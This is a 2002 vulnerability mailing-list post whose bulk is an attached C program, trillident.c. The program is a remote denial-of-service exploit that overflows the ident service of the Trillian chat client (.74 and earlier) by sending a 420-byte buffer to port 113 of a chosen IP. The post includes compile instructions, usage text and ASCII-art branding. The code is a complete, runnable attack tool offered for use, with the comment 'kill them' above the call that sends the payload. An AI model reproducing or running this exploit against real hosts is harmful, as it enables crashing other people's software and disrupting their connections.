'[VulnDiscuss] Re: Trillian .74 and below, ident flaw.'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       vulndiscuss
Subject:    [VulnDiscuss] Re: Trillian .74 and below, ident flaw.
From:       netmask {enZo} <netmask () enZ-o ! org>
Date:       2002-09-19 21:13:13
[Download RAW message or body]

> Lance Fitz-Herbert (fitzies@hotmail.com) composed on Sep 18, 2002:

Hello Lance, out of bordem I wrote one that compiles on un*x

trillident.c is attached


netmask @ enZo

["trillident.c" (TEXT/PLAIN)]


/* Trillian .74, .73 remote DoS..  Trillian Pro 1.0                                   \
                
 *    Exploits buffer overflow in ident when sending over
 *    418 bytes. 
 *
 *    Really only works if people are on IRC (otherwise, the ident
 *    daemon shuts down..  And you've got to know they are running
 *    Trillian, obviously.
 *
 *    bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002
 *
 *
 * Compile With:
 * Linux: gcc -o trillident trillident.c
 * Solaris: gcc -o trillident trillident.c -lsocket -lnsl
 * Windows: Use someone elses code.

                                    ZZZZZZZZZZZZZZZZZZZ
                                    Z:::::::::::::::::Z
                  nnnn  nnnnnnnn    Z:::::::::::::::::Z   ooooooooooo
                  n:::nn::::::::nn  Z:::ZZZZZZZ::::::Z  oo:::::::::::oo
     eeeeeeeeeee  n::::::::::::::nn ZZZZZ  * Z::::::Z  o:::::::::::::::o
   ee:::::::::::eenn:::::::::::::::n      2 Z:::::Z    o:::::oooo::::::o
  e:::::::::::::::een:::::nnnn:::::n     0 Z:::::Z     o::::o  o::o::::o
 e::::::eeeee::::::en::::n    n::::n    0 Z:::::Z      o::::o o::oo::::o
 e:::::e     e:::::en::::n    n::::n   2 Z:::::Z       o::::oo::o o::::o
 e::::::eeeee::::::en::::n    n::::n  * Z:::::Z        o::::o::o  o::::o
 e::::::::::::::::e n::::n    n::::n   Z:::::Z         o::::::oooo:::::o
 e:::::eeeeeeeeeee  n::::n    n::::nZZZ:::::Z     ZZZZZo:::::::::::::::o
 e::::::e           n::::n    n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo
 e:::::::e          nnnnnn    nnnnnnZ:::::::::::::::::Z   ooooooooooo
  e:::::::eeeeeeeeee                Z:::::::::::::::::Z
   ee::::::::::::::e                ZZZZZZZZZZZZZZZZZZZ
    ee:::::::::::::e             \... www.enz-o.org .../
     eeeeeeeeeeeeee

(The above is radical ascii art.. Respect it. The below is a lame DoS. )
                                                                                      \
                
*/

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define ERR -1



void usage(char* argv0);
int dostrill(char *ip, int port);

int main(int argc, char *argv[])
{

extern int optopt;
extern char *optarg;
int errorflag = 0; /* did someone screw up? */
int port = 113;	/* default port to use unless -p */
int c;

if ((argc < 2) || (argc > 6))
	usage(argv[0]);

while ((c=getopt(argc, argv, "vp:")) != EOF) {
	switch(c) {
		case 'p':
			fprintf(stderr, "Using port %s\n", optarg);
			port = strtol(optarg, NULL, 10);
			break;
		case 'v':
			fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
			fprintf(stderr, "written by: netmask@enZo\n\n");
			exit(0);
		case ':':
			fprintf(stderr, "Option -%c requires an operand\n", optopt);
			errorflag++;
			break;
		case '?':
			fprintf(stderr, "Unrecognized option: -%c\n", optopt);
			errorflag++;

	}
}

if (errorflag) {
		usage(argv[0]);
}

/* kill them */

dostrill(argv[argc-1], port);
fprintf(stderr, "Finished!\n");
return 0;
} /* end main */

void usage(char* argv0)
{
	fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n");
	fprintf(stderr, "Written by: netmask@enZo\n\n");
	fprintf(stderr, "Usage: %s [options] IP\n\n", argv0);
	fprintf(stderr,
			"-p \tPort to use\n"
			"-v \tPrint the program info\n");
	exit(1);
}

int dostrill(char *ip, int port)
{
	int s, r;
	char buf[420]; /* buffer to send */
	
	struct sockaddr_in addr;
	struct hostent *hp;
	memset((char *) &addr, '\0', sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr(ip);
	addr.sin_port = htons(port);
	memset(buf, 'A', 420);


	if ((hp = gethostbyname(ip)) != NULL) {
			if (hp->h_length > sizeof(addr.sin_addr)) {
				hp->h_length = sizeof(addr.sin_addr); }
		memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length);
	}
	else {
		if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) {
			return(0);
			 }
	}



	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (s == ERR) {
			fprintf(stderr, "Couldn't Create Socket\n");
			return 1;
	}
	
	
	r = connect(s, (struct sockaddr *) &addr, sizeof(addr));

	if (r == ERR) {
			fprintf(stderr, "Couldn't Establish Connection\n");
			return 1;
	}

	fprintf(stderr, "Connected to %s and sending buffer\n\n", ip);
	write(s, buf, strlen(buf)); /* send buffer */

	close(s);
	return 0;
	

}



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic